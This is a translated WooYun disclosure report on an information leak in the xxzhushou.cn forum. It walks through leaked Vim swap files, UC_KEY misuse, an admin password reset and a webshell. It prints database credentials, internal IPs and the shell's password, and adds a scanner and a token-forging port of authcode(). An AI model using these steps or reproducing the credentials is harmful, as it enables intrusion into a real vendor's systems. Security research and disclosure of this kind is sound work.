
Vulnerability summary (followers: 12)

Defect ID: WooYun-2016-177539

Title: Information disclosure in 叉叉助手 (xxzhushou) leads to getshell

Vendor: xxzhushou.cn

Author: mango

Submitted: 2016-02-21 22:45

Published: 2016-03-07 01:11

Type: Sensitive information disclosure

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact help@wooyun.org

Tags: Sensitive information disclosure


Vulnerability details

Disclosure status:

2016-02-21: Details reported to the vendor, awaiting vendor action
2016-02-22: Vendor confirmed; details disclosed to the vendor only
2016-03-03: Details disclosed to core white hats and domain experts
2016-03-13: Details disclosed to regular white hats
2016-03-23: Details disclosed to intern white hats
2016-03-07: Details disclosed to the public

Summary:

The vendor is back in action and there are gifts on offer, so here are a few bugs.

Details:

The problem is in the forum (bbs.xxzhushou.cn).

http://bbs.xxzhushou.cn/config/.config_ucenter.php.swp

http://bbs.xxzhushou.cn/uc_server/data/.config.inc.php.swp

These are Vim swap files left behind when the two config files were edited with vim; they were never cleaned up, and the web server serves them to anyone who asks for the name.
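The check behind this finding, as an added example (not code from the report or from xxzhushou.cn): Vim keeps its swap file as `.NAME.swp` (then `.swo`, `.swn`) next to the file being edited, so an interrupted or still-open editing session on a deployed config leaves a copy of the whole file in the web root, and Apache's stock config only denies `.ht*` while nginx denies nothing by default. `local_audit()` is the operator-side sweep of a deployed tree; `candidate_urls()` and `probe()` are the attacker-side probe for known config paths (network, only used from `__main__`). The web root built in `demo()` and the base URL in `__main__` are constructed placeholders.

```python
"""Editor leftovers under a web root: swap files, autosaves and backup copies."""
import os
import re
import shutil
import sys
import tempfile
import urllib.request
from urllib.parse import urljoin

VIM_SWAP_EXT = (".swp", ".swo", ".swn")                  # vim swap names, in creation order
BACKUP_SUFFIX = ("~", ".bak", ".orig", ".old", ".save")  # backup copies

# One regex for the three families: .NAME.swp / NAME.swp, #NAME# (Emacs
# autosave), NAME~ and friends (backup copies).
_ARTIFACT_RE = re.compile(
    r"^(?:\.?(?P<vim>.+)\.sw[pon]"
    r"|#(?P<emacs>.+)#"
    r"|(?P<bak>.+?)(?:~|\.bak|\.orig|\.old|\.save))$"
)


def classify(name):
    """(kind, original_file_name) if `name` is an editor artifact, else None."""
    m = _ARTIFACT_RE.match(name)
    if m is None:
        return None
    if m.group("vim"):
        return "vim-swap", m.group("vim")
    if m.group("emacs"):
        return "emacs-autosave", m.group("emacs")
    return "backup-copy", m.group("bak")


def local_audit(root):
    """Walk a deployed web root; return sorted (relative_path, kind, original)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for f in files:
            hit = classify(f)
            if hit:
                rel = os.path.relpath(os.path.join(dirpath, f), root)
                findings.append((rel.replace(os.sep, "/"), hit[0], hit[1]))
    return sorted(findings)


def candidate_urls(base, paths):
    """For each known file path, the artifact URLs worth requesting."""
    urls = []
    for p in paths:
        d, _, name = p.rpartition("/")
        prefix = d + "/" if d else ""
        urls += [urljoin(base, prefix + "." + name + ext) for ext in VIM_SWAP_EXT]
        urls += [urljoin(base, prefix + name + ext) for ext in VIM_SWAP_EXT]
        urls += [urljoin(base, prefix + name + suf) for suf in BACKUP_SUFFIX]
    return urls


def probe(urls, timeout=5):
    """Fetch each URL; keep those that look like a Vim swap file or PHP source."""
    hits = []
    for u in urls:
        try:
            with urllib.request.urlopen(u, timeout=timeout) as r:
                head = r.read(4096)
        except Exception:            # 404/403/timeouts all mean "not exposed"
            continue
        if head.startswith(b"b0VIM") or b"<?php" in head:   # b0VIM: swap file magic
            hits.append(u)
    return hits


def demo():
    """Constructed web root: two stale swap files and one backup copy."""
    root = tempfile.mkdtemp(prefix="webroot-")
    try:
        files = {
            "index.php": "<?php echo 'ok';",
            "config/config_ucenter.php": "<?php define('UC_KEY', 'placeholder');",
            "config/.config_ucenter.php.swp": "b0VIM 7.4 (placeholder swap)",
            "config/config_ucenter.php~": "<?php define('UC_KEY', 'old');",
            "uc_server/data/.config.inc.php.swp": "b0VIM 7.4 (placeholder swap)",
        }
        for rel, body in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(body)
        return local_audit(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for finding in demo():
        print("local:", *finding)
    if len(sys.argv) > 2:   # python scan.py http://host/ config/config_ucenter.php ...
        for u in probe(candidate_urls(sys.argv[1], sys.argv[2:])):
            print("exposed:", u)
```

The local sweep is the one to put in a deploy pipeline: a hit on `.swp` is also a sign that someone edits files directly on the production box, which is the habit that produced this report.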

[screenshot]



[screenshot]



The key had leaked, so I tested whether it still worked.

[screenshot]



It did. Using the key I changed the admin panel password: user admin, password mango1995.

[screenshot]
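Why a leaked UC_KEY is worth a "High": every `code=` parameter that uc_server and the Discuz side exchange is produced by UCenter's authcode() (uc_client ships the same routine as `_authcode`), and UC_KEY is its only secret. The routine is RC4 under a key derived from md5(UC_KEY), with a 16-hex-char truncated MD5 as the integrity tag, also keyed only by UC_KEY; whoever holds the key can decode any token seen in traffic and mint new ones the application will accept. The Python port below is an added example, not code from the report or the vendor; the `keyc` and `now` parameters are additions for deterministic testing (the PHP original draws `keyc` from md5(microtime()) and calls time()), and the key and payload in `__main__` are placeholders.

```python
"""Python port of UCenter's authcode(): RC4 plus a truncated MD5 tag, keyed by UC_KEY."""
import base64
import hashlib
import random
import time


def _md5hex(data):
    return hashlib.md5(data).hexdigest()


def _rc4(key, data):
    """RC4 exactly as written inside authcode(): key scheduling, then the PRGA."""
    box = list(range(256))
    j = 0
    for i in range(256):
        j = (j + box[i] + key[i % len(key)]) % 256
        box[i], box[j] = box[j], box[i]
    out = bytearray()
    a = j = 0
    for byte in data:
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        box[a], box[j] = box[j], box[a]
        out.append(byte ^ box[(box[a] + box[j]) % 256])
    return bytes(out)


def authcode(string, operation="DECODE", key="", expiry=0, keyc=None, now=None):
    """ENCODE returns the token a Discuz/uc_server `code=` parameter carries;
    DECODE returns the payload, or "" when the tag or expiry check fails."""
    ckey_length = 4
    now = int(time.time()) if now is None else now
    key = _md5hex(key.encode())               # md5(UC_KEY)
    keya = _md5hex(key[:16].encode())         # RC4 key material
    keyb = _md5hex(key[16:32].encode())       # tag key
    if operation == "DECODE":
        keyc = string[:ckey_length]           # the 4-char prefix travels in the clear
    elif keyc is None:
        keyc = _md5hex(repr(random.random()).encode())[-ckey_length:]
    cryptkey = (keya + _md5hex((keya + keyc).encode())).encode()

    if operation == "DECODE":
        body = string[ckey_length:]
        data = base64.b64decode(body + "=" * (-len(body) % 4))   # PHP strips the '='
        plain = _rc4(cryptkey, data)
        exp, tag, payload = plain[:10], plain[10:26], plain[26:]
        try:
            exp_ok = int(exp) == 0 or int(exp) - now > 0
        except ValueError:
            exp_ok = False   # PHP 5/7's loose "== 0" would accept garbage here; the tag still fails
        if exp_ok and tag == _md5hex(payload + keyb.encode())[:16].encode():
            return payload.decode("utf-8", "replace")
        return ""
    exp = "%010d" % (expiry + now if expiry else 0)
    payload = string.encode("utf-8")
    tag = _md5hex(payload + keyb.encode())[:16]
    plain = exp.encode() + tag.encode() + payload
    return keyc + base64.b64encode(_rc4(cryptkey, plain)).decode().rstrip("=")


if __name__ == "__main__":
    key = "placeholder-uc-key"                      # stands in for the leaked UC_KEY
    token = authcode("action=test&time=1456000000", "ENCODE", key)
    print("code=" + token)
    print("decoded:", authcode(token, "DECODE", key))
    print("wrong key:", repr(authcode(token, "DECODE", "other-key")))
```

Two things the port makes visible: the tag is computed over the payload only, so the expiry field is bound by nothing except the same key, and nothing in the token identifies which key minted it, so the only remediation after a leak is to change UC_KEY on uc_server and every connected application.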



Then, following http://wooyun.org/bugs/wooyun-2014-065559, I got a shell:

http://bbs.xxzhushou.cn/0.php, password: a

[screenshot]



Proof:

Running commands shows the host sits on quite a few networks:

Code:
[/data/web/xxzhushou/bbs/]$ /sbin/ifconfig
em1 Link encap:Ethernet HWaddr F0:1F:AF:D8:E1:A6
inet addr:14.18.239.130 Bcast:14.18.239.255 Mask:255.255.255.128
inet6 addr: fe80::f21f:afff:fed8:e1a6/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:46107535393 errors:0 dropped:243 overruns:0 frame:10303
TX packets:47409899906 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:16078038561918 (14.6 TiB) TX bytes:17325631484183 (15.7 TiB)
Interrupt:16

em1:0 Link encap:Ethernet HWaddr F0:1F:AF:D8:E1:A6
inet addr:122.13.72.194 Bcast:122.13.72.255 Mask:255.255.255.192
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:16

em1:1 Link encap:Ethernet HWaddr F0:1F:AF:D8:E1:A6
inet addr:183.232.69.157 Bcast:183.232.69.159 Mask:255.255.255.224
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:16

em1:2 Link encap:Ethernet HWaddr F0:1F:AF:D8:E1:A6
inet addr:192.168.1.130 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:16

em1:3 Link encap:Ethernet HWaddr F0:1F:AF:D8:E1:A6
inet addr:183.232.5.146 Bcast:183.232.5.159 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:16

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:11999976233 errors:0 dropped:0 overruns:0 frame:0
TX packets:11999976233 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:6578621050766 (5.9 TiB) TX bytes:6578621050766 (5.9 TiB)





Then I went straight for the leaks found earlier:

Code:
<?php


/////////////////////////////////////////////////////////////////////
// Design: database reads and writes are fully separated and use different connection parameters, so they can go to databases on different servers.
// The connection function tries the entries of the parameter array in order until one succeeds or all of them fail.
/////////////////////////////////////////////////////////////////////

$DB_CONFIG = array(
'read' => array(
array('dbms' => 'mysql',
'host' => '14.18.239.130',
'user' => 'analytics',
'password' => 'xxanal123&*(',
'port' => 3306,
'dbname' => 'analytics',
'charset' => 'utf8'
)
//additional read replicas go here
),
'write' => array(
array('dbms' => 'mysql',
'host' => '14.18.239.130',
'user' => 'analytics',
'password' => 'xxanal123&*(',
'port' => 3306,
'dbname' => 'analytics',
'charset' => 'utf8'
)
),
'api_backend' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.131',
'user' => 'testXXDb',
'password' => 'testXXDb123',
'port' => 3306,
'dbname' => 'testXXDb',
'charset' => 'utf8'
)
),
'api_feedback' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.130',
'user' => 'api_flamingo',
'password' => 'lad9Ad9@3^ladk*A',
'port' => 3306,
'dbname' => 'XXFeedBack',
'charset' => 'utf8'
)
),
'analyticsUser' => array(
array('dbms' => 'mysql',
'host' => '14.18.239.130',
'user' => 'analytics',
'password' => 'xxanal123&*(',
'port' => 3306,
'dbname' => 'XXUser',
'charset' => 'utf8'
)
),
'statistics' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.131',
'user' => 'xxstatistics',
'password' => 'xxst123789',
'port' => 3306,
'dbname' => 'XXStatistics',
'charset' => 'utf8'
)
),
'package' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.131',
'user' => 'xxstatistics',
'password' => 'xxst123789',
'port' => 3306,
'dbname' => 'package',
'charset' => 'utf8'
)
),
'eventlog' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.131',
'user' => 'xxstatistics',
'password' => 'xxst123789',
'port' => 3306,
'dbname' => 'eventlog',
'charset' => 'utf8',
'persistency' => true
)
),
'bbs' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.131',
'user' => 'xxbbs',
'password' => 'xxBbs789!3',
'port' => 3306,
'dbname' => 'XXBbs',
'charset' => 'utf8',
)
),
'bbs2' => array(
array('dbms' => 'mysql',
'host' => '127.0.0.1',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'mydiscuz',
'charset' => 'utf8',
)
),
'test' => array(
array('dbms' => 'mysql',
'host' => '127.0.0.1',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'test',
'charset' => 'utf8',
)
),
'statistics' => array(
array('dbms' => 'mysql',
'host' => '127.0.0.1',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'xxserver',
'charset' => 'utf8',
)
),
'api_backend' => array(
array('dbms' => 'mysql',
'host' => '127.0.0.1',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'xxserver',
'charset' => 'utf8',
)
),

'testUserWrite' => array(
array('dbms' => 'mysql',
'host' => '14.18.239.131',
'user' => 'testXXUser',
'password' => 'testXXUser123',
'port' => 3306,
'dbname' => 'testXXUser',
'charset' => 'utf8'
),
),
'testGuopan1' => array(
array('dbms' => 'mysql',
'host' => '14.18.239.131',
'user' => 'testGuopan',
'password' => 'testGp123@',
'port' => 3306,
'dbname' => 'testGuopan',
'charset' => 'utf8'
),
),
'testGuopan' => array(
array('dbms' => 'mysql',
'host' => 'localhost',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'test',
'charset' => 'utf8'
),
),
'guopan' => array(
array('dbms' => 'mysql',
'host' => 'localhost',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'guopan',
'charset' => 'utf8'
),
),
'xxcms' => array(
array('dbms' => 'mysql',
'host' => 'localhost',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'xxcms',
'charset' => 'utf8'
),
),
'oobbs' => array(
array('dbms' => 'mysql',
'host' => '127.0.0.1',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'oobbs',
'charset' => 'utf8'
),
),
'datastat' => array(// channel data statistics
array('dbms' => 'mysql',
'host' => '127.0.0.1',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'datasta',
'charset' => 'utf8'
),
),
'gpbbs' => array(// channel data statistics
array('dbms' => 'mysql',
'host' => '127.0.0.1',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'gpbbs',
'charset' => 'utf8'
),
),
//more databases go here
);

/////////////////////////////////////////////////////////////////////
//Cache config: use_config 0 means use the first entry, 1 the second
$CACHE_CONFIG = array(
'use_config' => 'file' ,
'memcache' =>
array('type' => 'memcache',
'server' => array(
// array('host' =>'server1', 'port' => '11211', 'weight' => '10'),
array('host' =>'192.168.1.130', 'port' => '11211', 'weight' => '10')
),
'ttl' => 7200,
'compress' => false,
),
'file' =>
array('type' => 'file',
'cache_dir'=> SYSDIR_CACHE . '/tmp/',
'ttl' => 600,
)
);

/////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////
//Session config: use_config 0 means use the first entry, 1 the second
$SESSION_CONFIG = array(
'use_config' => 'files' ,
'memcache' =>
array('type' => 'memcache',
'save_path' => 'tcp://192.168.1.130:11210',
'cache_expire' => 7200, //minutes
),
'files' =>
array('type' => 'files',
'save_path' => SYSDIR_CACHE . '/sessions/',
'cache_expire' => 180, //minutes
)
);
/////////////////////////////////////////////////////////////////////
//Redis config, mainly for statistics sets
$REDIS_CONFIG = array(
'write' => array(
array(
'host' => '127.0.0.1',
'port' => '6379',
'password' => '',
),
),
'read' => array(
array(
'host' => '127.0.0.1',
'port' => '6379',
'password' => '',
),
),
'api' => array(
array(
'host' => '192.168.1.132',
'port' => '6379',
'password' => '',
),
),
'testUser' => array(
array(
'host' => '192.168.1.131',
'port' => '6379',
'password' => '',
),
),
'user' => array(
array(
'host' => '192.168.1.130',
'port' => '6379',
'password' => '',
),
),
'testDm_level' => array(
array(
'host' => '192.168.1.131',
'port' => '6379',
'dbN' => 1,
'password' => '',
),
),
);
?>
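A file like the one above is a rotation list, not just a screenshot, and it has a trap: `'statistics'` and `'api_backend'` are each defined twice, and in a PHP array literal the last definition of a key wins, so the live `statistics` and `api_backend` pools are the `root` with empty password on 127.0.0.1, while the overwritten entries' passwords are still in the leak and still need rotating. The script below is an added example, not code from the report; it parses the `$DB_CONFIG` shape, resolves last-wins, groups pools by credential and flags the weak ones. `SAMPLE` is constructed here with placeholder hosts and passwords, not the real leaked values.

```python
"""Triage a leaked $DB_CONFIG-style PHP file: who to rotate, what PHP actually uses."""
import re
from collections import OrderedDict, defaultdict

SAMPLE = r"""<?php
$DB_CONFIG = array(
    'read' => array(
        array('dbms' => 'mysql', 'host' => '10.0.0.5', 'user' => 'app_ro',
              'password' => 'example-ro', 'port' => 3306, 'dbname' => 'app',
              'charset' => 'utf8')
    ),
    'write' => array(
        array('dbms' => 'mysql', 'host' => '10.0.0.5', 'user' => 'app_ro',
              'password' => 'example-ro', 'port' => 3306, 'dbname' => 'app',
              'charset' => 'utf8')
    ),
    'statistics' => array(
        array('dbms' => 'mysql', 'host' => '192.168.1.131', 'user' => 'stats',
              'password' => 'example-st@ts)', 'port' => 3306, 'dbname' => 'stats',
              'charset' => 'utf8')
    ),
    'statistics' => array(// channel data statistics
        array('dbms' => 'mysql', 'host' => '127.0.0.1', 'user' => 'root',
              'password' => '', 'port' => 3306, 'dbname' => 'xxserver',
              'charset' => 'utf8', 'persistency' => true)
    ),
    //more databases go here
);
"""

# A pool is NAME => array( array( ... ) ), optionally with a trailing comment
# after the first "array(" as in the leaked file.
_POOL_RE = re.compile(r"'(\w+)'\s*=>\s*array\s*\(\s*(?://[^\n]*\n\s*)?array\s*\(")
# Scalar pairs inside a pool entry: quoted strings, integers, booleans.
_KV_RE = re.compile(r"'(\w+)'\s*=>\s*('([^']*)'|\d+|true|false)")


def parse_pools(php_source):
    """All pool definitions in file order, duplicates included: [(name, {key: value})]."""
    m = re.search(r"\$DB_CONFIG\s*=\s*array\s*\((.*?)\n\);", php_source, re.S)
    body = m.group(1) if m else php_source
    starts = list(_POOL_RE.finditer(body))
    pools = []
    for i, start in enumerate(starts):
        end = starts[i + 1].start() if i + 1 < len(starts) else len(body)
        entry = {}
        for key, raw, quoted in _KV_RE.findall(body[start.end():end]):
            entry[key] = quoted if raw.startswith("'") else raw
        pools.append((start.group(1), entry))
    return pools


def _cred(entry):
    return (entry.get("host"), entry.get("port"), entry.get("user"), entry.get("password"))


def triage(pools):
    """Resolve last-wins, group the live pools by credential, flag the weak ones."""
    effective = OrderedDict()
    duplicates = set()
    for name, entry in pools:
        if name in effective:
            duplicates.add(name)
        effective[name] = entry                # PHP keeps the last definition
    by_cred = defaultdict(list)
    for name, entry in effective.items():
        by_cred[_cred(entry)].append(name)
    findings = []
    for (host, port, user, password), names in by_cred.items():
        if password == "":
            findings.append("empty password: %s@%s:%s used by %s" % (user, host, port, ",".join(names)))
        elif user == "root":
            findings.append("superuser account: %s@%s:%s used by %s" % (user, host, port, ",".join(names)))
    return {
        "credentials": dict(by_cred),
        "duplicates": sorted(duplicates),
        "rotate": {_cred(e) for _, e in pools},   # overwritten entries leaked too
        "findings": findings,
    }


if __name__ == "__main__":
    report = triage(parse_pools(SAMPLE))
    for cred, names in report["credentials"].items():
        print("%s@%s:%s -> %s" % (cred[2], cred[0], cred[1], ", ".join(names)))
    print("duplicate keys:", report["duplicates"])
    print("distinct credentials to rotate:", len(report["rotate"]))
    for f in report["findings"]:
        print("!", f)
```

Run against the real file the same way: the `rotate` set is what goes to the DBAs, the `findings` list is what goes to whoever owns the localhost MySQL with a passwordless root.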



[screenshots]

Fix:

Remove these leftover files promptly and tighten production hygiene. Deleting them does not undo the leak, though: the UC_KEY and every database credential in the config above have been exposed and need to be rotated, and the web server should refuse to serve dotfiles and editor swap/backup files so the next stray .swp is not exposed either.

Copyright notice: credit the source when reposting: mango@WooYun


Response

Vendor response:

Severity: High

Rank: 15

Confirmed: 2016-02-22 12:28

Vendor comment:

We will do a thorough cleanup of the bbs in the next release.

Latest status:

None yet


Comments

  1. 2016-02-22 14:16 | Mayter (Regular white hat | Rank:165 Vulnerabilities:40 | A caged chicken has food, but the soup pot is near; a wild crane has none, but the whole sky is its own.)
    1

    ...666
